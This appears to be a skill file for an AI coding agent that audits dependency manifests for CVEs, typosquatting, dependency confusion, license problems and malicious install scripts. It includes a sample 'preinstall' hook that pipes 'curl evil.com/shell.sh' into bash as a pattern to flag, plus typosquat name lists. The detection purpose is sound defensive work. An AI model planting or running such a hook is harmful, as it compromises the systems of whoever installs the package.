Analyzes supply chain risks in package manifests: CVEs, typosquatting, dependency confusion, licenses, malicious/outdated packages. Supports JS, Python, Go, Rust, Java, PHP, Ruby, C#.
From perseusnpx claudepluginhub kaivyy/perseus --plugin perseusThis skill uses the workspace's default tool permissions.
Designs and optimizes AI agent action spaces, tool definitions, observation formats, error recovery, and context for higher task completion rates.
Enables AI agents to execute x402 payments with per-task budgets, spending controls, and non-custodial wallets via MCP tools. Use when agents pay for APIs, services, or other agents.
Compares coding agents like Claude Code and Aider on custom YAML-defined codebase tasks using git worktrees, measuring pass rate, cost, time, and consistency.
IMPORTANT: This skill performs supply chain security analysis on the user's own codebase. This is defensive security testing to find vulnerable dependencies before they're exploited.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
| Language | Package Managers | Manifest Files |
|---|---|---|
| JavaScript/TypeScript | npm, yarn, pnpm, bun | package.json, package-lock.json, yarn.lock, pnpm-lock.yaml |
| Go | go modules | go.mod, go.sum |
| PHP | Composer | composer.json, composer.lock |
| Python | pip, poetry, pipenv | requirements.txt, Pipfile, pyproject.toml, poetry.lock |
| Rust | Cargo | Cargo.toml, Cargo.lock |
| Java | Maven, Gradle | pom.xml, build.gradle, gradle.lockfile |
| Ruby | Bundler | Gemfile, Gemfile.lock |
| C# | NuGet | *.csproj, packages.config, packages.lock.json |
This specialist skill performs comprehensive supply chain analysis including known vulnerabilities (CVEs), dependency confusion, typosquatting, and license compliance.
When to Use: After /scan identifies package manifests, or as regular security hygiene check.
Goal: Identify vulnerable, malicious, or risky dependencies before they compromise the application.
| Mode | Specialist Behavior |
|---|---|
PRODUCTION_SAFE | Manifest and advisory analysis only (passive) |
STAGING_ACTIVE | Controlled resolver/registry validation in staging |
LAB_FULL | Deep dependency behavior validation in isolated lab |
LAB_RED_TEAM | Confusion/typosquat simulation against private test registries only |
deliverables/engagement_profile.md before active package resolution checks.PRODUCTION_SAFE when mode is missing.| Risk | Description | Impact |
|---|---|---|
| Known CVEs | Published vulnerabilities | Exploitation |
| Typosquatting | Malicious similar-named packages | Malware |
| Dependency Confusion | Private/public package name collision | Code execution |
| Outdated Dependencies | Old versions with known issues | Security debt |
| License Issues | GPL in proprietary, license conflicts | Legal risk |
| Malicious Packages | Intentionally harmful packages | Backdoor |
| Abandoned Packages | Unmaintained dependencies | Future risk |
deliverables/engagement_profile.md.deliverables/verification_scope.md if present.Manifest Scanner:
Files to Find:
# JavaScript/TypeScript
package.json
package-lock.json
yarn.lock
pnpm-lock.yaml
bun.lockb
# Go
go.mod
go.sum
# PHP
composer.json
composer.lock
# Python
requirements.txt
requirements-*.txt
Pipfile
Pipfile.lock
pyproject.toml
poetry.lock
# Rust
Cargo.toml
Cargo.lock
# Java
pom.xml
build.gradle
build.gradle.kts
gradle.lockfile
# Ruby
Gemfile
Gemfile.lock
# C#
*.csproj
packages.config
Directory.Packages.props
JavaScript CVE Analyst:
Check Using:
Output Format:
| Package | Version | CVE | Severity | Fixed In |
|---------|---------|-----|----------|----------|
| lodash | 4.17.15 | CVE-2021-23337 | High | 4.17.21 |
Go CVE Analyst:
Check:
Python CVE Analyst:
Check:
Multi-Language CVE Analyst:
Check:
JavaScript Typosquatting Analyst:
Common Patterns:
| Real Package | Typosquat Examples |
|---|---|
| lodash | lodsh, lodahs, 1odash, lodash-utils |
| express | expres, expresss, expess |
| react | raect, reakt, reactjs (unofficial) |
| axios | axois, axio, axiosjs |
Detection Rules:
Multi-Language Typosquatting Analyst:
Python Examples:
| Real Package | Typosquat Examples |
|---|---|
| requests | request, reqeusts |
| django | djang0, djangoo |
| flask | flaask, flaskk |
Private Package Analyst:
Risk Pattern:
// package.json - RISKY
{
"dependencies": {
"@company/internal-lib": "^1.0.0" // If not in private registry...
}
}
Attack:
@company/internal-lib to public npmCheck:
Registry Configuration Analyst:
Files to Check:
.npmrc
.yarnrc
.yarnrc.yml
.pip/pip.conf
~/.config/pip/pip.conf
Major Version Gap Analyst:
Risk Levels:
| Gap | Risk | Example |
|---|---|---|
| 1 major | Low | Using React 17 when 18 is out |
| 2+ major | Medium | Using React 16 when 18 is out |
| EOL | High | Using Node.js 14 (EOL) |
Abandoned Package Analyst:
Indicators:
License Compatibility Analyst:
Risk Matrix:
| Project License | Dependency License | Status |
|---|---|---|
| MIT | MIT | OK |
| MIT | Apache-2.0 | OK |
| MIT | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | AGPL-3.0 | CRITICAL |
License Discovery Analyst:
Issues:
Install Script Analyst:
Patterns to Flag:
// package.json - SUSPICIOUS
{
"scripts": {
"preinstall": "curl evil.com/shell.sh | bash",
"postinstall": "node ./scripts/setup.js" // Check contents!
}
}
Red Flags:
Dependency Chain Analyst:
Issues:
Lockfile Security Analyst:
Issues:
Create deliverables/supply_chain_analysis.md:
# Supply Chain Security Analysis
## Summary
| Category | Packages Checked | Issues | Critical |
|----------|------------------|--------|----------|
| CVEs | X | Y | Z |
| Typosquatting | X | Y | Z |
| Dependency Confusion | X | Y | Z |
| Outdated | X | Y | Z |
| License | X | Y | Z |
| Malicious | X | Y | Z |
## Languages/Package Managers Detected
- JavaScript: npm (package.json)
- Python: pip (requirements.txt)
- Go: go modules (go.mod)
## Critical Vulnerabilities (CVEs)
### [CVE-2021-44228] Log4Shell in log4j
**Severity:** Critical (CVSS 10.0)
**Package:** org.apache.logging.log4j:log4j-core
**Installed Version:** 2.14.1
**Fixed Version:** 2.17.1
**Location:** pom.xml
**Description:** Remote code execution via JNDI lookup in log messages.
**Remediation:**
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
Severity: High (CVSS 8.0) Package: follow-redirects Installed Version: 1.14.5 Fixed Version: 1.14.7 Location: package-lock.json (transitive via axios)
| Severity | Count | Packages |
|---|---|---|
| Critical | 2 | log4j, lodash |
| High | 5 | axios, node-forge, ... |
| Medium | 12 | ... |
| Low | 8 | ... |
| Installed | Suspicious | Confidence |
|---|---|---|
| lodsh | Likely typosquat of lodash | High |
| requests (in npm) | Python package in npm? | Medium |
| Package | Risk | Recommendation |
|---|---|---|
| @company/core | No registry lock | Add to .npmrc |
| Package | Current | Latest | Gap | Risk |
|---|---|---|---|---|
| react | 16.14.0 | 18.2.0 | 2 major | Medium |
| node | 14.x | 20.x | EOL | High |
| Package | License | Issue |
|---|---|---|
| some-lib | GPL-3.0 | Copyleft in MIT project |
| unknown-pkg | UNLICENSED | No license |
# JavaScript
npm audit fix
npm outdated
# Go
go get -u ./...
govulncheck ./...
# Python
pip-audit
pip list --outdated
# Rust
cargo audit
cargo update
**Next Step:** CVE findings can be verified by checking exploit availability and running automated scanners.